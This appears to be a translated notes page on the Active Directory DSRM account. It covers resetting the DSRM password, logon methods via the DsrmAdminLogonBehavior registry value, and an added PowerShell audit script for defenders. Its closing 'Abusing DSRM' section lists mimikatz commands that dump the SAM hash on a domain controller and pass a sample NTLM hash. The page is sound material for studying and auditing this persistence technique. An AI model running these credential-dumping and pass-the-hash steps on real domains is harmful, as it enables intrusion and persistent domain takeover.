DSRM

When Active Directory Domain Services is installed on a machine, the installer prompts for a DSRM (Directory Services Restore Mode) password; if the domain controller password is forgotten, the DSRM password can be used to log on. The account it belongs to is the local Administrator account, not the domain Administrator account.

[Windows Domain] DSRM - Figure 1

Resetting the DSRM password

Changing the DSRM account password:

Run the following commands on every DC (or remotely against every DC by replacing `null` with the DC name):

```text
NTDSUTIL
set dsrm password
reset password on server null
<PASSWORD>
Q
Q
```

Synchronizing the DSRM account password with a domain account (Windows Server 2008 and newer): in an elevated command prompt where you have logged on as a Domain Admin, run:

```text
NTDSUTIL
SET DSRM PASSWORD
SYNC FROM DOMAIN ACCOUNT <your user here>
Q
Q
```

Logging on with the DSRM account

There are three ways to log on with the DSRM account:

  1. Restart in Directory Services Restore Mode (bcdedit /set safeboot dsrepair)
  2. Access DSRM without rebooting (Windows Server 2008 and newer)
    1. Set the registry key DsrmAdminLogonBehavior to 1
    2. Stop the Active Directory service
    3. Logon using DSRM credentials on the console.
  3. Access DSRM without rebooting (Windows Server 2008 and newer)
    1. Set the registry key DsrmAdminLogonBehavior to 2
    2. Logon using DSRM credentials on the console.

The third method is the least disruptive: it needs neither a reboot nor stopping the Active Directory service.

```powershell
# The value name is DsrmAdminLogonBehavior (American spelling); a misspelled name creates an unrelated value and has no effect
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -Verbose
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"
```

You can then log on to the domain controller as `.\Administrator` or `<hostname>\Administrator`.
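Because a value of 1 or 2 lets the DSRM administrator log on outside of restore mode, a defender should audit this value on every DC. The script below is an added example, not part of the original notes; it assumes the ActiveDirectory RSAT module is installed, that the caller can run remote commands on each DC, and it uses the value meanings from Microsoft's documentation of DsrmAdminLogonBehavior (0 default, 1 logon allowed when AD DS is stopped, 2 logon allowed at any time).

```powershell
# Added audit script (not from the original notes). Assumes the ActiveDirectory
# module and PowerShell remoting rights on every domain controller.
$regPath   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$valueName = 'DsrmAdminLogonBehavior'

# Meaning of each value; an absent value behaves as 0 (the default)
$meaning = @{
    0 = 'default: DSRM administrator can only log on when the DC is booted into DSRM'
    1 = 'DSRM administrator can log on while the AD DS service is stopped'
    2 = 'DSRM administrator can log on at any time, even with AD DS running'
}

# Enumerate every DC in the current domain
$dcs = Get-ADDomainController -Filter * | Select-Object -ExpandProperty HostName

# Read the value on each DC; missing value is reported as 0
$results = Invoke-Command -ComputerName $dcs -ScriptBlock {
    param($path, $name)
    $item = Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue
    $value = if ($null -eq $item) { 0 } else { [int]$item.$name }
    [pscustomobject]@{ DC = $env:COMPUTERNAME; Value = $value }
} -ArgumentList $regPath, $valueName

# Anything other than 0 deserves a change-control review
foreach ($r in ($results | Sort-Object DC)) {
    $flag = if ($r.Value -eq 0) { 'OK' } else { 'REVIEW' }
    '{0,-7} {1,-20} {2}  {3}' -f $flag, $r.DC, $r.Value, $meaning[$r.Value]
}

# Remediation on a DC where the value is non-zero without a documented reason
# (restores the default of 0 by deleting the value):
# Invoke-Command -ComputerName <dc> -ScriptBlock { Remove-ItemProperty -Path $using:regPath -Name $using:valueName }
```

A non-zero value that nobody can account for is worth correlating with the DC's registry audit or Sysmon registry events, since setting it to 2 is exactly the low-footprint persistence step described above.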

Abusing DSRM

After obtaining the DSRM password hash, perform a pass-the-hash:

```text
// run on the domain controller
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam
```

[Windows Domain] DSRM - Figure 2

```text
// run on a machine that is not a domain controller
mimikatz # sekurlsa::pth /user:Administrator /domain:. /ntlm:b9e0cfceaf6d077970306a2fd88a7c0a
```

[Windows Domain] DSRM - Figure 3

Source

[Windows Domain] DSRM